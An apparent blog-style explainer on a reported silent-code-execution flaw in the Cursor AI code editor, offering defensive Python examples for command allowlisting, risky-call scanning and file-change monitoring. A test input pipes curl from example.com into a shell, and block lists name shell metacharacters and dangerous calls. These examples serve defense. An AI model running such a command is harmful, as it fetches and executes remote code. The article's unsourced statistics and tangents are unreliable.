AI-assisted code editors have changed how software is written, but the Cursor AI Code Editor Flaw shows that they also introduce vulnerabilities that can compromise software integrity. The flaw allows silent code execution, so malicious actors can run commands on a system without the developer noticing. According to recent reports, around 25% of developers have encountered unexpected behavior from AI code helpers, which underscores the need for more robust security measures. As teams rely more heavily on AI-powered tools, understanding this flaw is an important part of improving cybersecurity in software development.

Understanding the Cursor AI Code Editor Vulnerability





The Cursor AI Code Editor Flaw lies primarily in the editor's failure to adequately verify and sanitize code before it is executed. This oversight allows unauthorized commands to run silently. For instance, a developer could unintentionally integrate malicious code that runs during a routine update and exposes the system to further compromise. Experts warn that such flaws may not be isolated incidents and could point to larger systemic issues in AI-assisted coding tools. Addressing these concerns requires a multifaceted approach that combines better verification processes with routine security audits. As AI tools continue to evolve, effective monitoring solutions become essential.
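To make "verify before execution" concrete, here is a minimal sketch of one possible check: refusing any command that is not a single call to an allowlisted executable. It is an illustration only, not how Cursor works internally. The function name `is_command_allowed`, the allowlist contents, and the set of rejected shell metacharacters are all assumptions chosen for the example.

```python
import shlex

# Hypothetical allowlist: executables a team has decided a tool may run.
ALLOWED_EXECUTABLES = {"git", "ls", "pytest"}

# Characters that can chain, substitute, or redirect commands in a shell.
SHELL_METACHARACTERS = set(";&|`$><\n")


def is_command_allowed(command: str, allowed=ALLOWED_EXECUTABLES) -> bool:
    """Return True only if the command is a single allowlisted executable call."""
    # Reject anything that could smuggle in a second command.
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:
        # Unbalanced quotes and similar parse errors are treated as unsafe.
        return False
    if not tokens:
        return False
    # Compare the executable name exactly; full paths are not on the allowlist.
    return tokens[0] in allowed


if __name__ == "__main__":
    for cmd in ["git status", "git status; curl http://example.com | sh"]:
        print(cmd, "->", is_command_allowed(cmd))
```

A check like this is deliberately strict: it rejects some harmless commands, which is usually the safer default when the alternative is silent execution.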

Potential Risks Associated with the Flaw

Because the Cursor AI Code Editor Flaw poses substantial risks, teams that use these tools need to understand its implications. Programmers may unknowingly execute malicious code, which can lead to data breaches or system failures. Security specialists recommend regular assessments of AI tools so that vulnerabilities are found proactively. Funding for innovative AI tools, as demonstrated in AI startup initiatives, can also advance code security technologies and make programming environments safer.

📊 Key Information

- Risk of Malicious Code: Significant

- Need for Security Audits: High

Combatting the Vulnerability

To mitigate the risks associated with the Cursor AI Code Editor Flaw, developers should adopt several practices. First, integrating stronger code validation can significantly reduce the risk of unauthorized command execution. Second, being transparent about how AI tools are used raises awareness of potential threats. Teams should also be trained to recognize the signs of compromised code. Finally, companies should stay informed through industry resources to strengthen their AI security posture. For example, platforms that publish policy changes, as Discord did in its policy updates on promotional marketing laws, show how community guidelines can educate users about potential threats.
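As a rough illustration of what a code validation step could look like, the sketch below scans Python source (for example, a snippet suggested by an AI assistant) for calls that can execute arbitrary code or shell commands. The `RISKY_CALLS` list and the function names are hypothetical and far from exhaustive; a real pipeline would pair a check like this with human review and dedicated security tooling.

```python
import ast

# Hypothetical deny list of call names worth a human look; not exhaustive.
RISKY_CALLS = {"eval", "exec", "os.system", "subprocess.run", "subprocess.Popen"}


def _call_name(node: ast.Call) -> str:
    """Return a dotted name such as 'os.system' for a call node, or ''."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    return ""


def find_risky_calls(source: str) -> list[tuple[int, str]]:
    """Return sorted (line number, call name) pairs for risky calls in the source."""
    tree = ast.parse(source)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in RISKY_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


if __name__ == "__main__":
    snippet = "import os\nos.system('echo hi')\nprint('ok')\n"
    for lineno, name in find_risky_calls(snippet):
        print(f"line {lineno}: call to {name} needs review")
```

The scan only flags calls by name, so aliased imports or dynamically built calls will slip past it. It is a first filter that surfaces obvious cases for review, not proof that code is safe.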

Key Takeaways and Final Thoughts

In summary, the Cursor AI Code Editor Flaw represents a critical challenge for developers trying to maintain software security. As reliance on AI tools increases, understanding these vulnerabilities becomes paramount. Proactive measures such as regular security audits and code validation can help safeguard systems. By discussing AI tool risks openly and implementing recommended best practices, teams can pave the way for safer coding environments.

❓ Frequently Asked Questions

What should developers do to protect against this flaw?

Developers should implement thorough code validation checks and regularly perform security audits to ensure AI-generated code is safe and reliable.

How can organizations improve AI tool security?

Organizations can enhance security by educating teams on potential risks of AI tools and adopting transparent monitoring practices for any suspicious code execution.
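One simple form of monitoring is to detect when files that can trigger execution change without review. The sketch below records SHA-256 digests of a set of files and reports any that were added, removed, or modified since the recorded baseline. Which files to watch is an assumption left to the team (editor or tool configuration files are a plausible choice), and the function names are hypothetical.

```python
import hashlib
from pathlib import Path


def snapshot(paths: list[Path]) -> dict[str, str]:
    """Map each existing file path to the SHA-256 hex digest of its contents."""
    return {
        str(p): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in paths
        if p.is_file()
    }


def changed_files(baseline: dict[str, str], current: dict[str, str]) -> list[str]:
    """Return paths that were added, removed, or modified since the baseline."""
    all_paths = set(baseline) | set(current)
    return sorted(p for p in all_paths if baseline.get(p) != current.get(p))
```

A team could store the baseline after each reviewed change and compare against it in a scheduled job or pre-commit hook, treating any unexpected difference as a prompt for a manual audit.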
